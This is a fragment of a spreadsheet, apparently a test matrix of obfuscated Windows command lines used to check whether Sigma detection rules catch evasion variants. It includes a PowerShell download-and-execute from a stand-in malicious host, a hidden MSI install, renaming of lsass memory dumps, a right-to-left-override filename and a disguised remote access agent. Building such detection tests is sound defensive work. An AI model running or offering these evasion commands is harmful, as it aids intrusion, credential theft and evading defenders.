      <c r="F119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H119" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="36" t="n"/>
      <c r="J119" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="36" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B120" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C120" s="36" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D120" s="36" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E120" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$c1='Invoke-'; $c2='Expression'; $run=$c1+$c2; &amp;$run (.('New-Object') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H120" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="36" t="n"/>
      <c r="J120" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B121" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C121" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D121" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E121" s="36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1" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H121" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="36" t="n"/>
      <c r="J121" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B122" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C122" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D122" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E122" s="36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2" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H122" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="43" t="n"/>
      <c r="J122" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B123" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C123" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D123" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E123" s="36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3" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H123" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="36" t="n"/>
      <c r="J123" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B124" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C124" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D124" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E124" s="36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4" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="36" t="n"/>
      <c r="J124" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B125" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C125" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D125" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E125" s="36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25" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="36" t="n"/>
      <c r="J125" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B126" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C126" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D126" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E126" s="36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26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H126" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="43" t="n"/>
      <c r="J126" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B127" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C127" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D127" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E127" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -COMmanD "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H127" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="43" t="n"/>
      <c r="J127" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B128" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C128" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D128" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E128" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H128" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="43" t="n"/>
      <c r="J128" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B129" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C129" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D129" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E129" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H129" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="43" t="n"/>
      <c r="J129" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B130" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C130" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D130" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E130" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H130" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="43" t="n"/>
      <c r="J130" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B131" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C131" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D131" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E131" s="36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131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H131" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="43" t="n"/>
      <c r="J131" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B132" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C132" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D132" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E132" s="36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132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H132" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="43" t="n"/>
      <c r="J132" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="36" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B133" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C133" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D133" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E133" s="36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133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H133" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="43" t="n"/>
      <c r="J133" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="36" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B134" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C134" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D134" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E134" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" /"suspicious_flag"</t>
        </is>
      </c>
      <c r="F134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H134" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="36" t="n"/>
      <c r="J134" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="36" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B135" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C135" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D135" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E135" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -"suspicious_flag"</t>
        </is>
      </c>
      <c r="F135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H135" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="36" t="n"/>
      <c r="J135" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="36" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B136" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C136" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D136" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E136" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -SuspicIOUS_FlAg</t>
        </is>
      </c>
      <c r="F136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H136" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="36" t="n"/>
      <c r="J136" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B137" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C137" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D137" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E137" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -SUspicioUs_flag</t>
        </is>
      </c>
      <c r="F137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H137" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="43" t="n"/>
      <c r="J137" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B138" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_calc_uncommon_exec</t>
        </is>
      </c>
      <c r="C138" s="36" t="inlineStr">
        <is>
          <t>Suspicious Calculator Usage</t>
        </is>
      </c>
      <c r="D138" s="36" t="inlineStr">
        <is>
          <t>737e618a-a410-49b5-bec3-9e55ff7fbc15</t>
        </is>
      </c>
      <c r="E138" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\calc.exe" -SusPiciOus_fLAG</t>
        </is>
      </c>
      <c r="F138" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G138" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H138" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="43" t="n"/>
      <c r="J138" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="43" t="n"/>
      <c r="B139" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_commandline_path_traversal_evasion</t>
        </is>
      </c>
      <c r="C139" s="36" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt</t>
        </is>
      </c>
      <c r="D139" s="36" t="inlineStr">
        <is>
          <t>1327381e-6ab0-4f38-b583-4c1b8346a56b</t>
        </is>
      </c>
      <c r="E139" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "C:\Windows/../Windows/System32/calc.exe"</t>
        </is>
      </c>
      <c r="F139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H139" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I139" s="36" t="n"/>
      <c r="J139" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K139" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="43" t="n"/>
      <c r="B140" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_commandline_path_traversal_evasion</t>
        </is>
      </c>
      <c r="C140" s="36" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt</t>
        </is>
      </c>
      <c r="D140" s="36" t="inlineStr">
        <is>
          <t>1327381e-6ab0-4f38-b583-4c1b8346a56b</t>
        </is>
      </c>
      <c r="E140" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "set UP=..&amp;&amp; call C:\Windows\%UP%\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H140" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="36" t="n"/>
      <c r="J140" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K140" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="43" t="n"/>
      <c r="B141" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C141" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D141" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E141" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H141" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="43" t="n"/>
      <c r="J141" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="43" t="n"/>
      <c r="B142" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C142" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D142" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E142" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H142" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="36" t="n"/>
      <c r="J142" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="43" t="n"/>
      <c r="B143" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C143" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D143" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E143" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="36" t="n"/>
      <c r="J143" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="43" t="n"/>
      <c r="B144" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C144" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D144" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E144" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I144" s="36" t="n"/>
      <c r="J144" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="43" t="inlineStr">
        <is>
          <t>t1036.002</t>
        </is>
      </c>
      <c r="B145" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_right_to_left_override</t>
        </is>
      </c>
      <c r="C145" s="36" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Via Right-to-Left Override</t>
        </is>
      </c>
      <c r="D145" s="36" t="inlineStr">
        <is>
          <t>ad691d92-15f2-4181-9aa4-723c74f9ddc3</t>
        </is>
      </c>
      <c r="E145" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$rtlo = [char]0x202E; &amp; \"C:\Users\thaim\Desktop\evil_batch${rtlo}fdp.bat\""</t>
        </is>
      </c>
      <c r="F145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="36" t="n"/>
      <c r="J145" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K145" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="43" t="n"/>
      <c r="B146" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C146" s="36" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D146" s="36" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E146" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="43" t="n"/>
      <c r="J146" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K146" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B147" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C147" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D147" s="43" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E147" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^o^p^y %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe</t>
        </is>
      </c>
      <c r="F147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="43" t="n"/>
      <c r="J147" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K147" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="36" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B148" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir</t>
        </is>
      </c>
      <c r="C148" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory</t>
        </is>
      </c>
      <c r="D148" s="36" t="inlineStr">
        <is>
          <t>fff9d2b7-e11c-4a69-93d3-40ef66189767</t>
        </is>
      </c>
      <c r="E148" s="36" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {gi $env:windir/System32/cmd.exe | % {copy $_.FullName -destination $env:allusersprofile\cmd.exe}}</t>
        </is>
      </c>
      <c r="F148" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G148" s="36" t="b">
        <v>0</v>
      </c>
